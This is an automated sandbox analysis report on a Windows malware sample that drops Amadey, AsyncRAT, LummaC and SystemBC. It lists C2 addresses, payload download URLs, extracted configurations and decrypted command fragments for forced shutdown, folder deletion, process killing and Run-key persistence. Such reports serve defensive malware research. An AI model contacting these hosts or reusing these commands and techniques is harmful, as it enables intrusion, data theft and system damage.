Windows Analysis Report
DhqvS8pXj8.exe

Overview

General Information

Sample name:	DhqvS8pXj8.exe renamed because original name is a hash value
Original sample name:	582f90039d305a4706f8556ac74dcb90.exe
Analysis ID:	1612327
MD5:	582f90039d305a4706f8556ac74dcb90
SHA1:	39f2454fcdd5ffd812034b5e3b8b7183722214ec
SHA256:	7676247d21cfeaa362f445d12ae1985db713e69f59bd512fb6d69b7c38faf5f4
Tags:	exeuser-abuse_ch
Infos:

Detection

Amadey, AsyncRAT, Healer AV Disabler, LummaC Stealer, PureLog Stealer, SystemBC

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Powershell download and execute file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected AntiVM3

Yara detected AsyncRAT

Yara detected Healer AV Disabler

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected SystemBC

Yara detected obfuscated html page

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Allocates memory in foreign processes

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Creates HTA files

Creates multiple autostart registry keys

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Drops PE files with a suspicious file extension

Found API chain indicative of sandbox detection

Hides threads from debuggers

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies windows update settings

PE file contains section with special chars

Powershell drops PE file

Sample uses string decryption to hide its real strings

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: PowerShell DownloadFile

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to download and execute files (via powershell)

Tries to evade debugger and weak emulator (self modifying code)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript called in batch mode (surpress errors)

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Entry point lies outside standard sections

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Tries to resolve many domain names, but no domain seems valid

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
SystemBC	SystemBC is a proxy malware leveraging SOCKS5. Based on screenshots used in ads on a underground marketplace, Proofpoint decided to call it SystemBC.SystemBC has been observed occasionally, but more pronounced since June 2019. First samples goes back to October 2018.	No Attribution	https://asec.ahnlab.com/en/33600/ https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html https://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight	https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DhqvS8pXj8.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.43/Zu7JuNko/index.php001	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/5765828710/ViGgA8C.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/ReverseSheller/random.exe	Avira URL Cloud: Label: malware
Source: pleasedcfrown.biz	Avira URL Cloud: Label: malware
Source: suggestyuoz.biz	Avira URL Cloud: Label: malware
Source: edcatiofireeu.shop	Avira URL Cloud: Label: malware
Source: impolitewearr.biz	Avira URL Cloud: Label: malware
Source: affordtempyo.biz	Avira URL Cloud: Label: malware
Source: hoursuhouy.biz	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/c0dxnfz/random.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/6158422886/r7MRNUY.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/7244183739/L5shRfh.exe	Avira URL Cloud: Label: phishing
Source: http://185.215.113.75/files/asjduwgsgausi/random.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/none/random.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpER	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/rast333a/random.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php~	Avira URL Cloud: Label: malware
Source: lightdeerysua.biz	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/5643377291/7fOMOTQ.exe	Avira URL Cloud: Label: malware
Source: mixedrecipew.biz	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/fate/random.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1075514001\d895046020.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\7fOMOTQ[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fe36XBk[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: LummaC {"C2 url": ["pleasedcfrown.biz", "affordtempyo.biz", "mixedrecipew.biz", "hoursuhouy.biz", "suggestyuoz.biz", "lightdeerysua.biz", "toppyneedus.biz", "impolitewearr.biz", "edcatiofireeu.shop"], "Build id": "Jxy8Jp--new"}
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: AsyncRAT {"External_config_on_Pastebin": "null", "Server": "159.100.19.137", "Ports": "7707", "Version": "0.5.8", "Autorun": "false", "Install_Folder": "svchost.exe", "Install_File": "MTZ4cVRldGczWDFoSHVwbHNqYlc2ZE9GUXRheUlEdnY="}
Source: 66.2.fbpbh.exe.33c0690.0.unpack	Malware Configuration Extractor: SystemBC {"HOST1": "wodresomdaymomentum.org", "HOST2": "wodresomdaymomentum.org", "DNS1": "5.132.191.104", "DNS2": "ns1.vic.au.dns.opennic.glue", "DNS3": "ns2.vic.au.dns.opennic.glue"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\jhbbvnx\fbpbh.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fe36XBk[1].exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k6Sly2p[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\7fOMOTQ[1].exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\L5shRfh[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1075515001\k6Sly2p.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1075517001\7fOMOTQ.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\1075519001\Fe36XBk.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 59%

Multi AV Scanner detection for submitted file

Source: DhqvS8pXj8.exe	ReversingLabs: Detection: 59%
Source: DhqvS8pXj8.exe	Virustotal: Detection: 47%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1075514001\d895046020.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\7fOMOTQ[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fe36XBk[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Joe Sandbox ML: detected
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k6Sly2p[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\L5shRfh[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: DhqvS8pXj8.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: pleasedcfrown.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: affordtempyo.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: mixedrecipew.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: hoursuhouy.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: suggestyuoz.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lightdeerysua.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: toppyneedus.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: impolitewearr.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: edcatiofireeu.shop
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 185.215.113.43
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: S-%lu-
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abc3bc1985
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: skotes.exe
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Startup
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Programs
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: %USERPROFILE%
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: clip.dll
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: http://
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: https://
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /quiet
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Plugins/
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: &unit=
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shell32.dll
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: kernel32.dll
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProgramData\
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: AVAST Software
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Kaspersky Lab
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Panda Security
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Doctor Web
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 360TotalSecurity
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Bitdefender
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Norton
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Sophos
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Comodo
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: WinDefender
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 0123456789
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ------
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ?scr=1
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ComputerName
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -unicode-
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: VideoID
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProductName
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: CurrentBuild
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32.exe
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: "taskkill /f /im "
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && timeout 1 && del
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: && Exit"
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && ren
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Powershell.exe
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shutdown -s -t 0
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: random
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: 7707
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: 159.100.19.137
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: 0.5.8
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: false
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: yBu0GW2G5zAc
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: MIIE7DCCAtSgAwIBAgIQAM+os8tD+NpTWChT8JYtyzANBgkqhkiG9w0BAQ0FADAXMRUwEwYDVQQDDAxUcnVzdCBTZXJ2ZXIwIBcNMjUwMTIwMDM1NjA0WhgPOTk5OTEyMzEyMzU5NTlaMBcxFTATBgNVBAMMDFRydXN0IFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJ5FzkhjuI8et+p8G29QDGsZ28VZ1PtKbMZx8FrxkUQoQBU7DXFh8mfgTQUhWgMqctpupDC+UhQxQkedPdHe9SvuAtpKEWUFOQzNQMTy3JEvHv3UZfM9Ib5ICGCQtcqInk73RbEh7QdFBK6wE57zENL9lXy8aEBeJk/elSNvLTJwbpa+lP20hlBuuyBWqvPd4/DinQJIRYSIEPDa3hcefGCbnoTp3dg9jttDM+MXtGEz4OurkP47+nFeHgQe7FkNCi5UHaiwvNs8JR7L1yR7HTPlvSwRtAkC0STJtczRA93If63bYMkaC+1QNHQR+WN3c9MCK6SLbGk4nMfSiG3ybohbKhNoJIcsdyFyOOn6N54eCaEwwNzDlb1qkor0bemYVuaT3ZRG27H6C9R9eqyoHQ4WTppSBIm+MBQ+gimD6XdEUCBcM0qAvrVFEy+mFn8FIhKAng9fgPnd47WWJGosTjsezqxJTVYYhUn2dm/VU3O0sdfzJ8O9dIO4htYIs+X5PMuBP2HyLGDsa+VpEkayYMYGmiHD6wDrO20+Z5BdbGUikNdfKo4goEu3A/HIa7YuzFN70ma9Qb+7P448L3mu8pLbll+0iUNo2rYrJ+7nMjduOTeKdBPPYNBHj57Zdd1MkQaIBhHNQ04qdBZYUhJclvbLlx1nPLSMQI9XL0NoRDXvAgMBAAGjMjAwMB0GA1UdDgQWBBSnnBI6rWXybai+OiRUoM3TzO1xlTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCLFgYyTM5EWEcXb2nZYzeqhuu/lhz0AuSDBoXDWQYuV1CgsKoab0s2yZ1v0jRw77uM1AsLSRhBurUqdmn+iZVi/vtys/BrLFwuc/5hQkz5MFZAt2qJFc8QRV8E6jJcjuapfJT4oweDd8J1Dstz2x2g6IV8mT5mApzjom+zZwy0G9Qm6S72xbaz8HZicPNRfDUR0SMg652oet7qMrCa2T5T5lrh3+XDogmC1ofzA2lbWuhOb6LNs0uzjiC/NENspNylQFf1D+odhNDdQQHu91SSZLnouuhb9jErxYvCoW7c5U14xsNPKRAjcONjtPSbhMvIwaApa2/wVSil0bk8dbSLnA6Kx7UBPgls8ec/jhgkHTycXE6U8XoPS+louYxi5EdwvqghzRC/itX+SPBq9pMpN8FWXEgVliWc0ViOwS/okPlCW60cFGU+R0lQbYJDyVDqJBflraw7Hqb7cQS5v2gCgogUQBqD9I7SiYbbqs0GUh/b3Zv+Qt7wKzyEGJNuoRei7uDp1xb5uDNprDkZomqHmiSKc1LggyPY4+rcNLDTEkXPq/cjMI2CzPXEpHARNgMQ/YEzM07I51CLT2Szm7G3z8uIng35vjc24l3AqClQ1dcJHQBIHjEqoqrUGLmjUiFfGuL549Mt6Na3OmoCTb0J+r6S8/sp2l/nX9HqHqAoxA==
